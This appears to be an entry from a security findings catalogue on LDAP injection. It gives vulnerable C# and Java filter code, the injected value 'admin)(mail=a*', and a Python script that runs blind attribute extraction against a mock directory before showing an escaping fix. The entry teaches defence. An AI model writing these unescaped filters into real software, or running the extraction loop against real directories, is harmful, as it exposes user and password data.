AttackFlow Findings Dictionary


LDAP Injection

An attacker can inject partial LDAP filter strings through user-supplied parameters and read information they are not authorized to see, such as user attributes or password data, or use the directory to mount company-wide password guessing attacks.

Severity

Critical

Fix Cost

Low

Trust Level

High

LDAP (Lightweight Directory Access Protocol) is a directory service protocol that provides a mechanism to search and manipulate directory entries. Its common usage is as a central store for corporate user information, such as usernames, passwords and similar account attributes.

For example, intranet portals commonly provide an interface that lets users look up their colleagues' details by supplying a search keyword, such as an email address or a name.

Suppose the backend code is similar to the following C# snippet:

using System.DirectoryServices;

// Request["name"] is untrusted user input concatenated straight into the filter
DirectorySearcher ds = new DirectorySearcher();
ds.Filter = "(&(objectClass=user)(name=" + Request["name"] + "))";
SearchResultCollection results = ds.FindAll();


For example, sending admin)(mail=a* as Request["name"] turns the filter into (&(objectClass=user)(name=admin)(mail=a*)). If the details of the admin user come back, the attacker learns that the admin's email address starts with the character a; repeating the probe with other characters and progressively longer prefixes extracts the whole attribute. This is blind injection: no data is read directly, only the presence or absence of a result is observed. Where the directory permits filter matching on the password attribute, the same technique can be used to extract stored password data character by character instead of guessing it.

Every injection attack occurs because code and untrusted data are mixed. As developers, we are rarely given APIs that keep the two apart until runtime. In the code above, mixing the data (the name coming from the user) with the code (the partial LDAP filter in the program) results in LDAP injection: the attacker can manipulate the LDAP filter and access information that he could not access otherwise.

The same finding looks like this in a Java backend that uses JNDI:

// name comes straight from the request, e.g. request.getParameter("name")
String searchFilter = "(&(objectClass=user)(name=" + name + "))";
DirContext ctx = new InitialDirContext(env); // env holds the LDAP connection settings
NamingEnumeration<SearchResult> answer = ctx.search(searchBase, searchFilter, searchCtls);
...


Sending admin)(mail=a* as request.getParameter("name") has exactly the same effect here: the resulting filter is (&(objectClass=user)(name=admin)(mail=a*)), and whether the admin user's details are returned tells the attacker whether the admin's email address starts with a. The blind extraction described above works unchanged against this code.

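The probe described above for both the C# and the Java snippet, carried through to a full attribute extraction and then neutralised, as an added example that is not part of the original page. The technique does not depend on the backend language, so it is written in Python: the sample entries, the attribute names and the in-memory filter evaluator standing in for the LDAP server are all constructed here (the evaluator supports only &, |, equality, presence and substring filters with case-insensitive matching, which is enough for this finding); a real application would send the same filter strings to a directory through DirectorySearcher or JNDI.

```python
"""Blind LDAP injection, and the RFC 4515 fix, against an in-memory directory.
Added example, not the page's own code: the entries, attribute names and the
result oracle are constructed here; a real app would send the same filter
strings to an LDAP server through DirectorySearcher or JNDI."""
import re

# Constructed sample entries (not from any real directory).
DIRECTORY = [
    {"objectClass": "user", "name": "admin", "mail": "alice@example.com"},
    {"objectClass": "user", "name": "bob", "mail": "bob@example.com"},
    {"objectClass": "group", "name": "admin", "mail": "ops@example.com"},
]

def escape_filter_value(value: str) -> str:
    """Escape the characters RFC 4515 reserves inside a filter value.
    Non-ASCII characters are valid as-is in a UTF-8 filter and are left alone."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value)

def build_filter_unsafe(name: str) -> str:
    """The same concatenation as the page's C# and Java snippets."""
    return "(&(objectClass=user)(name=" + name + "))"

def build_filter_safe(name: str) -> str:
    """Hardened form: the escaped value cannot close (name=...) or add items."""
    return "(&(objectClass=user)(name=" + escape_filter_value(name) + "))"

# --- Minimal filter evaluator standing in for the LDAP server -----------------
def _unescape(s: str) -> str:
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)

def _parse(s: str, pos: int):
    """Parse one parenthesised filter at s[pos]; return (node, offset after it)."""
    if s[pos] != "(":
        raise ValueError("expected '(' at offset %d" % pos)
    pos += 1
    if s[pos] in "&|":
        op, children, pos = s[pos], [], pos + 1
        while s[pos] == "(":
            child, pos = _parse(s, pos)
            children.append(child)
        if s[pos] != ")":
            raise ValueError("unbalanced filter")
        return (op, children), pos + 1
    end = s.index(")", pos)  # a raw ')' always ends a simple item; escaped ones are \29
    attr, _, pattern = s[pos:end].partition("=")
    return ("=", attr, pattern), end + 1

def _matches(entry: dict, node) -> bool:
    if node[0] in "&|":
        combine = all if node[0] == "&" else any
        return combine(_matches(entry, c) for c in node[1])
    _, attr, pattern = node
    actual = entry.get(attr)
    if actual is None:
        return False
    if pattern == "*":  # presence filter
        return True
    actual = actual.lower()  # caseIgnoreMatch, as most string attributes use
    parts = [_unescape(p).lower() for p in pattern.split("*")]  # split on raw '*' first
    if len(parts) == 1:  # equality
        return actual == parts[0]
    if len(actual) < len(parts[0]) + len(parts[-1]):
        return False
    if not (actual.startswith(parts[0]) and actual.endswith(parts[-1])):
        return False
    middle, idx = actual[len(parts[0]):len(actual) - len(parts[-1])], 0
    for piece in parts[1:-1]:  # substring filter: initial*any*...*final
        idx = middle.find(piece, idx)
        if idx < 0:
            return False
        idx += len(piece)
    return True

def search(filter_string: str) -> list:
    """The oracle the attacker observes: the entries the portal would display."""
    node, end = _parse(filter_string, 0)
    if end != len(filter_string):
        raise ValueError("trailing data after filter")
    return [e for e in DIRECTORY if _matches(e, node)]

# --- Blind extraction ---------------------------------------------------------
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789@.-_"

def extract_attribute(victim: str, attr: str, build_filter, max_len: int = 64) -> str:
    """Recover <attr> of the entry named <victim> one character at a time by
    sending  victim)(attr=<known><ch>*  as the 'name' parameter and treating a
    non-empty result as 'yes'; the admin)(mail=a* probe from the text, looped."""
    known = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            if search(build_filter("%s)(%s=%s%s*" % (victim, attr, known, ch))):
                known += ch
                break
        else:
            break  # no character extends the prefix: the value is complete
    return known
```

Calling extract_attribute("admin", "mail", build_filter_unsafe) returns the admin's full address after at most one alphabet sweep per character, while extract_attribute("admin", "mail", build_filter_safe) returns the empty string because the escaped probe is compared literally with the name attribute and never matches. The objectClass=user term still applies in both cases, which is why the group entry with the same name is never returned. The fix for the C# and Java snippets is the same: escape the user-supplied value (or use a library escaper that does) before concatenating it into the filter; rejecting anything but letters and digits in a name is a stricter alternative where the application can afford it.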
